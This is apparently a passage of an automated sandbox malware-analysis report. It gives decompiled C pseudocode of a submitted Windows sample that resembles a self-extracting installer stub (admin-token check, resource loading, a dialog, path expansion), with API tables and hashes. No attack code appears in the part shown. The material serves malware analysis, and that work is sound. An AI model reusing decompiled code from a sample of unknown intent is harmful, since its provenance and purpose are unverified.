                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0xfd8128 = 1;
                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00fd18a3
                                                                                                                                                                                                    0x00fd18a3
                                                                                                                                                                                                    0x00fd18ab
                                                                                                                                                                                                    0x00fd18b2
                                                                                                                                                                                                    0x00fd18b5
                                                                                                                                                                                                    0x00fd18be
                                                                                                                                                                                                    0x00fd18c0
                                                                                                                                                                                                    0x00fd18c6
                                                                                                                                                                                                    0x00fd18c7
                                                                                                                                                                                                    0x00fd18ca
                                                                                                                                                                                                    0x00fd18cf
                                                                                                                                                                                                    0x00fd19c9
                                                                                                                                                                                                    0x00fd19d8
                                                                                                                                                                                                    0x00fd19d8
                                                                                                                                                                                                    0x00fd18df
                                                                                                                                                                                                    0x00fd19b8
                                                                                                                                                                                                    0x00fd19bd
                                                                                                                                                                                                    0x00fd19bf
                                                                                                                                                                                                    0x00fd19bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd19bd
                                                                                                                                                                                                    0x00fd18fa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1912
                                                                                                                                                                                                    0x00fd19aa
                                                                                                                                                                                                    0x00fd19ad
                                                                                                                                                                                                    0x00fd19b3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1927
                                                                                                                                                                                                    0x00fd1927
                                                                                                                                                                                                    0x00fd1932
                                                                                                                                                                                                    0x00fd1936
                                                                                                                                                                                                    0x00fd19a9
                                                                                                                                                                                                    0x00fd19a9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd19a9
                                                                                                                                                                                                    0x00fd194c
                                                                                                                                                                                                    0x00fd19a2
                                                                                                                                                                                                    0x00fd19a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd196e
                                                                                                                                                                                                    0x00fd1970
                                                                                                                                                                                                    0x00fd1999
                                                                                                                                                                                                    0x00fd199c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd199c
                                                                                                                                                                                                    0x00fd1972
                                                                                                                                                                                                    0x00fd1972
                                                                                                                                                                                                    0x00fd1975
                                                                                                                                                                                                    0x00fd1984
                                                                                                                                                                                                    0x00fd1985
                                                                                                                                                                                                    0x00fd198a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd198c
                                                                                                                                                                                                    0x00fd1991
                                                                                                                                                                                                    0x00fd1996
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1996
                                                                                                                                                                                                    0x00fd194c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FD18DD), ref: 00FD181A
                                                                                                                                                                                                      • Part of subcall function 00FD17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FD182C
                                                                                                                                                                                                      • Part of subcall function 00FD17EE: AllocateAndInitializeSid.ADVAPI32(00FD18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FD18DD), ref: 00FD1855
                                                                                                                                                                                                      • Part of subcall function 00FD17EE: FreeSid.ADVAPI32(?,?,?,?,00FD18DD), ref: 00FD1883
                                                                                                                                                                                                      • Part of subcall function 00FD17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00FD18DD), ref: 00FD188A
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00FD18EB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00FD18F2
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00FD190A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00FD1918
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 00FD192C
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00FD1944
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FD1964
                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 00FD197A
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 00FD199C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00FD19A3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FD19AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                    • Opcode ID: 3db54a283bcd54c9ff01ac613d44cf9613adf741071bd56e2c8b719be7c8fda8
                                                                                                                                                                                                    • Instruction ID: 04fd806a3cd279619bfae7bc7538c494c5b4315b20df07a936ab9dcd5cb5ca16
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3db54a283bcd54c9ff01ac613d44cf9613adf741071bd56e2c8b719be7c8fda8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73316D71E01209BFDB209FB5DC58AAFBBBEFF04350F140426E541D2254D7309905EB26
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00FD468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				CHAR* _t14;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				long _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 = __ecx;
                                                                                                                                                                                                    				_t11 = __edx;
                                                                                                                                                                                                    				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                    				_t16 = _t4;
                                                                                                                                                                                                    				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                    					if(_t16 == 0) {
                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                    					FreeResource(_t15);
                                                                                                                                                                                                    					return _t16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00fd4699
                                                                                                                                                                                                    0x00fd469b
                                                                                                                                                                                                    0x00fd46a9
                                                                                                                                                                                                    0x00fd46af
                                                                                                                                                                                                    0x00fd46b4
                                                                                                                                                                                                    0x00fd46bc
                                                                                                                                                                                                    0x00fd46f9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd46f9
                                                                                                                                                                                                    0x00fd46d9
                                                                                                                                                                                                    0x00fd46dd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd46e5
                                                                                                                                                                                                    0x00fd46ef
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd46f5
                                                                                                                                                                                                    0x00fd46ff

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: TITLE$nst0dum
                                                                                                                                                                                                    • API String ID: 3370778649-1250357435
                                                                                                                                                                                                    • Opcode ID: 3f32d7b5ca52ae394c100a7963f5983e3e1be8784059edde766b7e5f54583b7a
                                                                                                                                                                                                    • Instruction ID: 26e7f3a892616ea3b990f980060958ef5331cf29a51e8d27d6f4931438d1a437
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f32d7b5ca52ae394c100a7963f5983e3e1be8784059edde766b7e5f54583b7a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401F9326452087BE31017B55C0DF2B7F2EDBC6F62F084116FB4A87280C971D840A6BA
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                    			E00FD17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t37 = __ecx;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v28 = __ecx;
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                    					_v20 = _t20;
                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                    							 *0xfda288(0, _v24, _v28);
                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00fd17f6
                                                                                                                                                                                                    0x00fd17fd
                                                                                                                                                                                                    0x00fd1805
                                                                                                                                                                                                    0x00fd180b
                                                                                                                                                                                                    0x00fd180d
                                                                                                                                                                                                    0x00fd1815
                                                                                                                                                                                                    0x00fd1818
                                                                                                                                                                                                    0x00fd1820
                                                                                                                                                                                                    0x00fd1824
                                                                                                                                                                                                    0x00fd182c
                                                                                                                                                                                                    0x00fd1832
                                                                                                                                                                                                    0x00fd1837
                                                                                                                                                                                                    0x00fd1851
                                                                                                                                                                                                    0x00fd1854
                                                                                                                                                                                                    0x00fd185d
                                                                                                                                                                                                    0x00fd1862
                                                                                                                                                                                                    0x00fd186c
                                                                                                                                                                                                    0x00fd1872
                                                                                                                                                                                                    0x00fd1877
                                                                                                                                                                                                    0x00fd187e
                                                                                                                                                                                                    0x00fd187e
                                                                                                                                                                                                    0x00fd1883
                                                                                                                                                                                                    0x00fd1883
                                                                                                                                                                                                    0x00fd185d
                                                                                                                                                                                                    0x00fd188a
                                                                                                                                                                                                    0x00fd188a
                                                                                                                                                                                                    0x00fd18a2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FD18DD), ref: 00FD181A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FD182C
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(00FD18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FD18DD), ref: 00FD1855
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,00FD18DD), ref: 00FD1883
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00FD18DD), ref: 00FD188A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                    • Opcode ID: 7bc75770bedec5e94ecd846ec99bcc41e90950b331d34faacb2cb9591f832948
                                                                                                                                                                                                    • Instruction ID: 4148cda4b77c450ad580f5f4bdf2d52805e55592984bbe2a78285a98688ead39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bc75770bedec5e94ecd846ec99bcc41e90950b331d34faacb2cb9591f832948
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE118131E01209ABDB109FB4EC49ABEBB7AFF44711F14016BF901E2390DA308D00AB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t7 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                    					EndDialog(_a4, 2);
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t7 - 0x100;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					_t12 = GetDesktopWindow();
                                                                                                                                                                                                    					_t24 = _a4;
                                                                                                                                                                                                    					E00FD43D0(_t24, _t12);
                                                                                                                                                                                                    					SetWindowTextA(_t24, "nst0dum");
                                                                                                                                                                                                    					SetDlgItemTextA(_t24, 0x838,  *0xfd9404);
                                                                                                                                                                                                    					SetForegroundWindow(_t24);
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t11 == 1) {
                                                                                                                                                                                                    					_t22 = _a12;
                                                                                                                                                                                                    					if(_t22 < 6) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 <= 7) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						EndDialog(_a4, _t22);
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 != 0x839) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0xfd91dc = 1;
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00fd3459
                                                                                                                                                                                                    0x00fd345c
                                                                                                                                                                                                    0x00fd34d8
                                                                                                                                                                                                    0x00fd34de
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd34e0
                                                                                                                                                                                                    0x00fd345e
                                                                                                                                                                                                    0x00fd3463
                                                                                                                                                                                                    0x00fd349a
                                                                                                                                                                                                    0x00fd34a0
                                                                                                                                                                                                    0x00fd34a7
                                                                                                                                                                                                    0x00fd34b2
                                                                                                                                                                                                    0x00fd34c4
                                                                                                                                                                                                    0x00fd34cb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd34cb
                                                                                                                                                                                                    0x00fd3468
                                                                                                                                                                                                    0x00fd346e
                                                                                                                                                                                                    0x00fd3474
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd347c
                                                                                                                                                                                                    0x00fd348c
                                                                                                                                                                                                    0x00fd3490
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3496
                                                                                                                                                                                                    0x00fd3484
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3486
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3486
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00FD3490
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00FD349A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00FD34B2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 00FD34C4
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00FD34CB
                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00FD34D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 852535152-432003757
                                                                                                                                                                                                    • Opcode ID: 1d220d4036b95c5e5bd048283e487c388eb6742a700c8d8ab2a45331dc57ea16
                                                                                                                                                                                                    • Instruction ID: d5ab9aa587831e56d1c0e88561e3a7c186e8d35ebd83c2008a4e908dbc71903d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d220d4036b95c5e5bd048283e487c388eb6742a700c8d8ab2a45331dc57ea16
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D01F532641128ABC7169F74EC0C96E3B23EB06710F084013FA06837A0C7798F41FB86
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E00FD2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				char _t32;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				char* _t38;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                    				CHAR* _t59;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t60 = __edx;
                                                                                                                                                                                                    				_t16 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                    				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                    				_t65 = _a4;
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t64 = __ecx;
                                                                                                                                                                                                    				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                    					GetModuleFileNameA( *0xfd9a3c,  &_v268, 0x104);
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_t17 =  *_t64;
                                                                                                                                                                                                    						if(_t17 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                    						 *_t65 =  *_t64;
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t65[1] = _t64[1];
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *_t64 != 0x23) {
                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                    							_t65 = CharNextA(_t65);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 = CharNextA(_t64);
                                                                                                                                                                                                    							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                    								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                    									if( *_t64 == 0x23) {
                                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00FD1680(_t65, E00FD17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    									_t52 = _t65;
                                                                                                                                                                                                    									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                    									_t60 = _t14;
                                                                                                                                                                                                    									do {
                                                                                                                                                                                                    										_t32 =  *_t52;
                                                                                                                                                                                                    										_t52 =  &(_t52[1]);
                                                                                                                                                                                                    									} while (_t32 != 0);
                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								E00FD65E8( &_v268);
                                                                                                                                                                                                    								_t55 =  &_v268;
                                                                                                                                                                                                    								_t62 = _t55 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t34 =  *_t55;
                                                                                                                                                                                                    									_t55 = _t55 + 1;
                                                                                                                                                                                                    								} while (_t34 != 0);
                                                                                                                                                                                                    								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                    								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                    									 *_t38 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E00FD1680(_t65, E00FD17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    								_t59 = _t65;
                                                                                                                                                                                                    								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                    								_t60 = _t12;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t42 =  *_t59;
                                                                                                                                                                                                    									_t59 =  &(_t59[1]);
                                                                                                                                                                                                    								} while (_t42 != 0);
                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                    								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t64 = CharNextA(_t64);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *_t65 = _t17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00fd2aac
                                                                                                                                                                                                    0x00fd2ab7
                                                                                                                                                                                                    0x00fd2abc
                                                                                                                                                                                                    0x00fd2abe
                                                                                                                                                                                                    0x00fd2ac3
                                                                                                                                                                                                    0x00fd2ac6
                                                                                                                                                                                                    0x00fd2ac9
                                                                                                                                                                                                    0x00fd2ace
                                                                                                                                                                                                    0x00fd2ae6
                                                                                                                                                                                                    0x00fd2bdc
                                                                                                                                                                                                    0x00fd2bdc
                                                                                                                                                                                                    0x00fd2be0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2af2
                                                                                                                                                                                                    0x00fd2afc
                                                                                                                                                                                                    0x00fd2b00
                                                                                                                                                                                                    0x00fd2b05
                                                                                                                                                                                                    0x00fd2b05
                                                                                                                                                                                                    0x00fd2b0b
                                                                                                                                                                                                    0x00fd2bca
                                                                                                                                                                                                    0x00fd2bd1
                                                                                                                                                                                                    0x00fd2b11
                                                                                                                                                                                                    0x00fd2b18
                                                                                                                                                                                                    0x00fd2b26
                                                                                                                                                                                                    0x00fd2b99
                                                                                                                                                                                                    0x00fd2bc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2b9b
                                                                                                                                                                                                    0x00fd2bae
                                                                                                                                                                                                    0x00fd2bb3
                                                                                                                                                                                                    0x00fd2bb5
                                                                                                                                                                                                    0x00fd2bb5
                                                                                                                                                                                                    0x00fd2bb8
                                                                                                                                                                                                    0x00fd2bb8
                                                                                                                                                                                                    0x00fd2bba
